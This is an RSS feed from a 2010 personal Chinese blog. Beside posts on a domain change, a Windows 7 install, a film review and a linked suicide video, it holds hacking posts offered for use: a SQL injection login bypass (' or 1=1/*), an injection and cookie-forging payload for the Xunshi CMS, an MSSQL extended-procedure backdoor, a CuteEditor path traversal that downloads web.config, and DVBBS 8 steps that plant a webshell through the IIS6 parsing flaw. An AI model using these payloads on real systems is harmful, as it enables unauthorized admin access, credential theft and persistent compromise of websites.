<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>小毅&#039;s Blog</title>
	<atom:link href="http://xiaoyi.us/feed" rel="self" type="application/rss+xml" />
	<link>http://xiaoyi.us</link>
	<description>要有最朴素的生活与最遥远的梦想.即使明日天寒地冻，路远马亡。</description>
	<lastBuildDate>Wed, 02 Jun 2010 09:47:25 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>麻木的中国人</title>
		<link>http://xiaoyi.us/archives/419</link>
		<comments>http://xiaoyi.us/archives/419#comments</comments>
		<pubDate>Wed, 02 Jun 2010 09:47:25 +0000</pubDate>
		<dc:creator>小毅</dc:creator>
				<category><![CDATA[心情日志]]></category>

		<guid isPermaLink="false">http://xiaoyi.us/?p=419</guid>
		<description><![CDATA[男子跳楼全过程
]]></description>
			<content:encoded><![CDATA[<p><a href='http://player.youku.com/player.php/sid/XMjYxMTM5ODA=/v.swf' >男子跳楼全过程</a></p>
]]></content:encoded>
			<wfw:commentRss>http://xiaoyi.us/archives/419/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>换域名了</title>
		<link>http://xiaoyi.us/archives/408</link>
		<comments>http://xiaoyi.us/archives/408#comments</comments>
		<pubDate>Thu, 20 May 2010 01:17:36 +0000</pubDate>
		<dc:creator>小毅</dc:creator>
				<category><![CDATA[心情日志]]></category>

		<guid isPermaLink="false">http://xiaoyi.us/?p=408</guid>
		<description><![CDATA[  joybh.com
]]></description>
			<content:encoded><![CDATA[<p>  <a href="http://joybh.com">joybh.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://xiaoyi.us/archives/408/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP下的万能密码登陆方法</title>
		<link>http://xiaoyi.us/archives/406</link>
		<comments>http://xiaoyi.us/archives/406#comments</comments>
		<pubDate>Tue, 18 May 2010 04:51:39 +0000</pubDate>
		<dc:creator>小毅</dc:creator>
				<category><![CDATA[php]]></category>
		<category><![CDATA[万能密码]]></category>

		<guid isPermaLink="false">http://xiaoyi.us/archives/406</guid>
		<description><![CDATA[ 如果一个网站的前台都是注入漏洞，那么凭经验，万能密码进后台的几率基本上百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启，就会对特殊符号转义，就彻底杜绝了PHP注入。其实说这话的人没有好好想过，更没有尝试过用万能密码进PHP的后台。其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。
        如果你用这样的万能密码‘or&#8217;='or’，当然进不去，理由是GPC开启的时候单引号会被转换。
        PHP注入时我常用的万能密码是：‘or 1=1/*.
 ...]]></description>
			<content:encoded><![CDATA[<p> 如果一个网站的前台都是注入漏洞，那么凭经验，万能密码进后台的几率基本上百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启，就会对特殊符号转义，就彻底杜绝了PHP注入。其实说这话的人没有好好想过，更没有尝试过用万能密码进PHP的后台。其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。</p>
<p>        如果你用这样的万能密码‘or&#8217;='or’，当然进不去，理由是GPC开启的时候单引号会被转换。<span id="more-406"></span></p>
<p>        PHP注入时我常用的万能密码是：‘or 1=1/*.</p>
<p>        那我们分析一下为什么这可以进后台。</p>
<p>        如果sql语句这样写：“SELECT * FROM admin where name=’”.$_POST['name'].“‘andpassword=’”.$_POST['password'].“‘”,那我们在帐号处输入万能密码&#8217;or 1=1/*，密码随便输，sql语句就成了select * from admin where name=&#8221;or 1=1/*&#8217; and password=’任意字符‘。</p>
<p>        /*为mysql的注释符，这样后面的东西就都被注释掉了，也就是为什么密码随便输的原因。假设GPC转换没有开启，那么请看：where name=&#8221;or 1=1（*/后面的东西被注释掉了），name=&#8217;’的逻辑值为假，而后面的1=1逻辑值则为真，对于整体就成了假 or 真，最终的逻辑值还是真，就进后台了。</p>
<p>        那么如果GPC转换开启了，就对单引号进行了转换。语句就变成了where name=&#8217;\'or 1=1,再看一下和刚才有什么区别，无非是多了个\。name=&#8217;\‘与name=&#8217;’的逻辑值一样，都为假，那1=1为真，总的sql语句的逻辑值不还是真吗？那有进不去后台的理由吗？</p>
<p>        所以总的来说，php网站的万能密码可以这样写：‘or 1=1/*，而GPC转换是否开启对它没有任何影响！</p>
<p>        所以请改变你的想法：存在字符型注入的php网站是可以用万能密码&#8217;or 1=1/*的<!--more--></p>
]]></content:encoded>
			<wfw:commentRss>http://xiaoyi.us/archives/406/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>讯时通杀0DAY</title>
		<link>http://xiaoyi.us/archives/404</link>
		<comments>http://xiaoyi.us/archives/404#comments</comments>
		<pubDate>Mon, 17 May 2010 06:38:28 +0000</pubDate>
		<dc:creator>小毅</dc:creator>
				<category><![CDATA[网站入侵]]></category>
		<category><![CDATA[0DAY]]></category>
		<category><![CDATA[讯时]]></category>

		<guid isPermaLink="false">http://xiaoyi.us/?p=404</guid>
		<description><![CDATA[有人公布了，讯时漏洞问题真大 ！！！！
/admin/admin_news_pl_view.asp?id=1   //id任意 填入以下语句
有时1显示错误信息的时候继续往后退2，3，4。。。。
&#124;&#8217;+dfirst(&#8220;[user]&#8220;,&#8221;[admin]&#8220;)+chr(124)+dfirst(&#8220;[pass]&#8220;,&#8221;[admin]&#8220;),username=&#8217;
cookies进后台
javascript:alert(document.cookie=&#8221;adminuser=&#8221; + escape(&#8220;admin&#8221;));alert(document.cookie=&#8221;adminpass=&#8221; + escape(&#8220;480d6d6b4d57cc903f3bab877248da40&#8243;));
]]></description>
			<content:encoded><![CDATA[<p>有人公布了，讯时漏洞问题真大 ！！！！<br />
/admin/admin_news_pl_view.asp?id=1   //id任意 填入以下语句<br />
有时1显示错误信息的时候继续往后退2，3，4。。。。<br />
|&#8217;+dfirst(&#8220;[user]&#8220;,&#8221;[admin]&#8220;)+chr(124)+dfirst(&#8220;[pass]&#8220;,&#8221;[admin]&#8220;),username=&#8217;<br />
cookies进后台<br />
javascript:alert(document.cookie=&#8221;adminuser=&#8221; + escape(&#8220;admin&#8221;));alert(document.cookie=&#8221;adminpass=&#8221; + escape(&#8220;480d6d6b4d57cc903f3bab877248da40&#8243;));</p>
]]></content:encoded>
			<wfw:commentRss>http://xiaoyi.us/archives/404/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>小红伞 V10 P版添加信任文件（夹）</title>
		<link>http://xiaoyi.us/archives/398</link>
		<comments>http://xiaoyi.us/archives/398#comments</comments>
		<pubDate>Fri, 14 May 2010 12:32:15 +0000</pubDate>
		<dc:creator>小毅</dc:creator>
				<category><![CDATA[电脑诊所]]></category>
		<category><![CDATA[P版]]></category>
		<category><![CDATA[v10]]></category>
		<category><![CDATA[信任文件添加]]></category>
		<category><![CDATA[小红伞]]></category>

		<guid isPermaLink="false">http://xiaoyi.us/?p=398</guid>
		<description><![CDATA[系统换了个windows7，打算装个杀软，就选小红伞吧！好久没用过了。装的是P版的。
装好后，电脑上有很多文件都是黑软的东东，都会报毒的，于是设置下信任文件。在小红伞的专家模式下。
【扫描-例外】和【Guard-例外】里均添加外挂所在文件夹


]]></description>
			<content:encoded><![CDATA[<p>系统换了个windows7，打算装个杀软，就选小红伞吧！好久没用过了。装的是P版的。</p>
<p>装好后，电脑上有很多文件都是黑软的东东，都会报毒的，于是设置下信任文件。在小红伞的专家模式下。</p>
<p>【扫描-例外】和【Guard-例外】里均添加外挂所在文件夹<span id="more-398"></span></p>
<p><img class="alignnone size-full wp-image-399" src="http://xiaoyi.us/wp-content/uploads/2010/05/11.jpg" alt="" width="802" height="570" /></p>
<p><img class="alignnone size-full wp-image-400" src="http://xiaoyi.us/wp-content/uploads/2010/05/21.jpg" alt="" width="804" height="567" /></p>
]]></content:encoded>
			<wfw:commentRss>http://xiaoyi.us/archives/398/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PE下安装windows7</title>
		<link>http://xiaoyi.us/archives/396</link>
		<comments>http://xiaoyi.us/archives/396#comments</comments>
		<pubDate>Fri, 14 May 2010 11:08:58 +0000</pubDate>
		<dc:creator>小毅</dc:creator>
				<category><![CDATA[电脑诊所]]></category>
		<category><![CDATA[PE下安装windows7]]></category>

		<guid isPermaLink="false">http://xiaoyi.us/?p=396</guid>
		<description><![CDATA[普通PE下安装windows7，系统默认安装在C盘(在PE下直接setup安装不了)
论坛中有人发过硬盘安装windows8的帖子，忘了他叫什么，本人学习了他的精华，个别地方有小改动，安装成功，在这里感谢他。
1.把WINDOWS7的ISO镜像解压到D:\windows7\。
2.进入PE，格式化C盘为NTFS。
3.从D:\windows7\提取boot和bootmgr这两个文件到C盘根目录。再从D:\windows7\sources提取boot.wim和  install.wim这两个文件到C:\sources。
4.在PE中运行cmd，输入下面一行后回车
c:\boot\bootsect.exe /nt60 c:
然后重起电脑。
5.出现安装界面，不要点现在安装，点左下角“repairing computer”进入系统恢复选项，选最后  一项“command prompt”，进入DOS窗口。
6.进入DOS后，输入D:\windows7\sources\setup.exe，回车，进入系统的正常安装，选安装位置时记得要格式化C盘。
其他windows系统也可以按照这个方法来装的，省资源啊！^_^ 
]]></description>
			<content:encoded><![CDATA[<p>普通PE下安装windows7，系统默认安装在C盘(在PE下直接setup安装不了)</p>
<p>论坛中有人发过硬盘安装windows8的帖子，忘了他叫什么，本人学习了他的精华，个别地方有小改动，安装成功，在这里感谢他。</p>
<p>1.把WINDOWS7的ISO镜像解压到D:\windows7\。<br />
2.进入PE，格式化C盘为NTFS。<span id="more-396"></span><br />
3.从D:\windows7\提取boot和bootmgr这两个文件到C盘根目录。再从D:\windows7\sources提取boot.wim和  install.wim这两个文件到C:\sources。<br />
4.在PE中运行cmd，输入下面一行后回车<br />
c:\boot\bootsect.exe /nt60 c:<br />
然后重起电脑。<br />
5.出现安装界面，不要点现在安装，点左下角“repairing computer”进入系统恢复选项，选最后  一项“command prompt”，进入DOS窗口。<br />
6.进入DOS后，输入D:\windows7\sources\setup.exe，回车，进入系统的正常安装，选安装位置时记得要格式化C盘。<br />
<span style="color: #ff0000;">其他windows系统也可以按照这个方法来装的，省资源啊！^_^ </span></p>
]]></content:encoded>
			<wfw:commentRss>http://xiaoyi.us/archives/396/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>禁闭岛影评</title>
		<link>http://xiaoyi.us/archives/391</link>
		<comments>http://xiaoyi.us/archives/391#comments</comments>
		<pubDate>Tue, 11 May 2010 14:26:39 +0000</pubDate>
		<dc:creator>小毅</dc:creator>
				<category><![CDATA[电影赏析]]></category>
		<category><![CDATA[影评]]></category>
		<category><![CDATA[禁闭岛]]></category>

		<guid isPermaLink="false">http://xiaoyi.us/?p=391</guid>
		<description><![CDATA[
本来看影片类型是惊悚片，想看刺激的，想不到看完后没害怕的感觉，还不如说是一部悬疑片呢！（个人见解）
”是行尸走肉的活&#8230;还是堂堂正正地死。“
最后主角去割除了脑干，至于主角为什么最后决定去死，我想是因为自己对人生绝望了，自己的孩子们都死了，妻子被自己杀死了。还不如活在角色扮演的游戏中呢。。。。  （这里只是自己的观点）
   刚搜到一篇文章，作者看的很深入。电影《禁闭岛》终极解读而我觉得自己还是没仔细的看。嘿嘿
]]></description>
			<content:encoded><![CDATA[<p><img src="http://xiaoyi.us/wp-content/uploads/2010/05/15858394410b4c27d31b70d9.jpg" alt="" title="" width="600" height="889" class="alignnone size-full wp-image-392" /><br />
本来看影片类型是惊悚片，想看刺激的，想不到看完后没害怕的感觉，还不如说是一部悬疑片呢！（个人见解）<br />
”是行尸走肉的活&#8230;还是堂堂正正地死。“<br />
最后主角去割除了脑干，至于主角为什么最后决定去死，我想是因为自己对人生绝望了，自己的孩子们都死了，妻子被自己杀死了。还不如活在角色扮演的游戏中呢。。。。  （这里只是自己的观点）<br />
   刚搜到一篇文章，作者看的很深入。<a href="http://i.yoho.cn/120804/logview/2218531.html">电影《禁闭岛》终极解读</a>而我觉得自己还是没仔细的看。嘿嘿</p>
]]></content:encoded>
			<wfw:commentRss>http://xiaoyi.us/archives/391/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SQL扩展存储后门</title>
		<link>http://xiaoyi.us/archives/388</link>
		<comments>http://xiaoyi.us/archives/388#comments</comments>
		<pubDate>Tue, 11 May 2010 11:27:20 +0000</pubDate>
		<dc:creator>小毅</dc:creator>
				<category><![CDATA[tools]]></category>
		<category><![CDATA[mssql]]></category>
		<category><![CDATA[扩展存储后门]]></category>

		<guid isPermaLink="false">http://xiaoyi.us/?p=388</guid>
		<description><![CDATA[http://www.t00ls.net/thread-7327-1-1.html
1、以SA连接SQL Server 执行
copy xp_readmails.dll c:\wmpub\xp_readmails.dll
USE master //要根据具体情况来确定当前数据库
dbcc addextendedproc(&#8216;xp_readmails&#8217;,'c:\wmpub\xp_readmails.dll&#8217;);
grant exec on xp_readmails to public; //将执行权限给所有用户
提示成功过后，调用:
exec xp_readmails &#8216;ver >c:\test11.txt&#8217;;
2、exec master..sp_dropextendedproc &#8216;xp_readmails&#8217;; //删除指定的扩展存储过程xp_readmails
SQL扩展存储后门
]]></description>
			<content:encoded><![CDATA[<p>http://www.t00ls.net/thread-7327-1-1.html</p>
<p>1、以SA连接SQL Server 执行<br />
copy xp_readmails.dll c:\wmpub\xp_readmails.dll<br />
USE master //要根据具体情况来确定当前数据库<br />
dbcc addextendedproc(&#8216;xp_readmails&#8217;,'c:\wmpub\xp_readmails.dll&#8217;);<span id="more-388"></span><br />
grant exec on xp_readmails to public; //将执行权限给所有用户</p>
<p>提示成功过后，调用:<br />
exec xp_readmails &#8216;ver >c:\test11.txt&#8217;;</p>
<p>2、exec master..sp_dropextendedproc &#8216;xp_readmails&#8217;; //删除指定的扩展存储过程xp_readmails<br />
<a href='http://xiaoyi.us/wp-content/uploads/2010/05/SQL扩展存储后门.rar'>SQL扩展存储后门</a></p>
]]></content:encoded>
			<wfw:commentRss>http://xiaoyi.us/archives/388/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>cuteeditor编辑器利用方法两则</title>
		<link>http://xiaoyi.us/archives/386</link>
		<comments>http://xiaoyi.us/archives/386#comments</comments>
		<pubDate>Tue, 11 May 2010 07:47:15 +0000</pubDate>
		<dc:creator>小毅</dc:creator>
				<category><![CDATA[网站入侵]]></category>
		<category><![CDATA[cuteeditor]]></category>
		<category><![CDATA[webshell]]></category>

		<guid isPermaLink="false">http://xiaoyi.us/?p=386</guid>
		<description><![CDATA[作者:w01f
方法1.直接下载load.ashx配置文件
http://www.xxxx.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&#038;file=../../../web.config
然后查看一些sql配置信息 从sql数据库连接入手

































方法2.2003 iis解析(后台拿webshell)
填加新闻&#8211;上传音乐，视频等图标&#8212;新建目录xx.asp 然后上传小马x.avi
图片方面因为格式检查严格~！不成功~求突破。
]]></description>
			<content:encoded><![CDATA[<p>作者:w01f</p>
<p>方法1.直接下载load.ashx配置文件</p>
<p>http://www.xxxx.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&#038;file=../../../web.config</p>
<p>然后查看一些sql配置信息 从sql数据库连接入手<span id="more-386"></span></p>
<p><connectionStrings><br />
<add name="ynncConnectionString" connectionString="Server=.;DataBase=ynta; UID=sa;PWD="/><br />
<add name="strConn" connectionString="Server=.;DataBase=ynta; UID=sa;PWD="/><br />
</connectionStrings><br />
<location path="admin/images"><br />
<system.web><br />
<authorization><br />
<allow users="?" roles="Admin,Manager,User"/><br />
</authorization><br />
</system.web><br />
</location></p>
<p><location path="admin"><br />
<system.web><br />
<authorization><br />
<deny users="?" roles="Admin,Manager,User"/><br />
<allow users="*"/><br />
</authorization><br />
</system.web><br />
</location></p>
<p><location path="admin/YNTA_UpFile"><br />
<system.web><br />
<authorization><br />
<allow users="?" roles="Admin,Manager,User"/><br />
</authorization><br />
</system.web><br />
</location></p>
<p><location path="admin/flv"><br />
<system.web><br />
<authorization><br />
<allow users="?" roles="Admin,Manager,User"/><br />
</authorization><br />
</system.web><br />
</location></p>
<p>方法2.2003 iis解析(后台拿webshell)</p>
<p>填加新闻&#8211;上传音乐，视频等图标&#8212;新建目录xx.asp 然后上传小马x.avi</p>
<p>图片方面因为格式检查严格~！不成功~求突破。</p>
]]></content:encoded>
			<wfw:commentRss>http://xiaoyi.us/archives/386/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>最新DVBBS8.0以上版本后台提升webshell</title>
		<link>http://xiaoyi.us/archives/379</link>
		<comments>http://xiaoyi.us/archives/379#comments</comments>
		<pubDate>Sun, 09 May 2010 12:52:33 +0000</pubDate>
		<dc:creator>小毅</dc:creator>
				<category><![CDATA[网站入侵]]></category>
		<category><![CDATA[dvbbs8]]></category>
		<category><![CDATA[webshell]]></category>
		<category><![CDATA[后台]]></category>

		<guid isPermaLink="false">http://xiaoyi.us/?p=379</guid>
		<description><![CDATA[作者：char
如果服务器支持PHP，那么，在版块设置里面对某某版块设置上传格式里面增加php，可以传成功。上传地址在后台文件管理处查看。
这次这个后台提权漏洞是上个星期无意中发现的。
1、登录后台，风格界面－模板导出  在附加说明处写入一句话木马

2、点击“导出”成功导出到skins下面的dv_skin.mdb

3、选择数据处理－备份数据库  如图填写
（../skins/dv_skin.mdb已经存在了我们的一句话，然后我们把他备份为XX.mdb－因为dvbbs8以上后，就对备份的数据库名称做了严格判断，只有当后缀是.mdb的时候才能备份成功，所以我这里填char.mdb 。中间备份数据库目录 以XX.ASP的格式写入，不存在，他就自动创建。这就利用了IIS6.0的解析漏洞了。我们看下面就能看明白）

4、点击确定，得到地址，使用一句话木马连接，后台获取webshell成功。

5.一句话木马地址 例： http://www.xxx.com/bbs/a.asp/char.mdb
使用一句话木马连接端连接.

]]></description>
			<content:encoded><![CDATA[<p>作者：char<br />
如果服务器支持PHP，那么，在版块设置里面对某某版块设置上传格式里面增加php，可以传成功。上传地址在后台文件管理处查看。<br />
这次这个后台提权漏洞是上个星期无意中发现的。<br />
1、登录后台，风格界面－模板导出  在附加说明处写入一句话木马<br />
<img src="http://xiaoyi.us/wp-content/uploads/2010/05/111008734.jpg" alt="" title="" width="569" height="210" class="alignnone size-full wp-image-380" /><span id="more-379"></span><br />
2、点击“导出”成功导出到skins下面的dv_skin.mdb<br />
<img src="http://xiaoyi.us/wp-content/uploads/2010/05/111008580.jpg" alt="" title="" width="571" height="82" class="alignnone size-full wp-image-381" /><br />
3、选择数据处理－备份数据库  如图填写<br />
（../skins/dv_skin.mdb已经存在了我们的一句话，然后我们把他备份为XX.mdb－因为dvbbs8以上后，就对备份的数据库名称做了严格判断，只有当后缀是.mdb的时候才能备份成功，所以我这里填char.mdb 。中间备份数据库目录 以XX.ASP的格式写入，不存在，他就自动创建。这就利用了IIS6.0的解析漏洞了。我们看下面就能看明白）<br />
<img src="http://xiaoyi.us/wp-content/uploads/2010/05/111009621.jpg" alt="" title="" width="568" height="248" class="alignnone size-full wp-image-382" /><br />
4、点击确定，得到地址，使用一句话木马连接，后台获取webshell成功。<br />
<img src="http://xiaoyi.us/wp-content/uploads/2010/05/111009360.jpg" alt="" title="" width="571" height="82" class="alignnone size-full wp-image-383" /><br />
5.一句话木马地址 例： http://www.xxx.com/bbs/a.asp/char.mdb<br />
使用一句话木马连接端连接.<br />
<img src="http://xiaoyi.us/wp-content/uploads/2010/05/111010371.jpg" alt="" title="" width="659" height="445" class="alignnone size-full wp-image-384" /></p>
]]></content:encoded>
			<wfw:commentRss>http://xiaoyi.us/archives/379/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
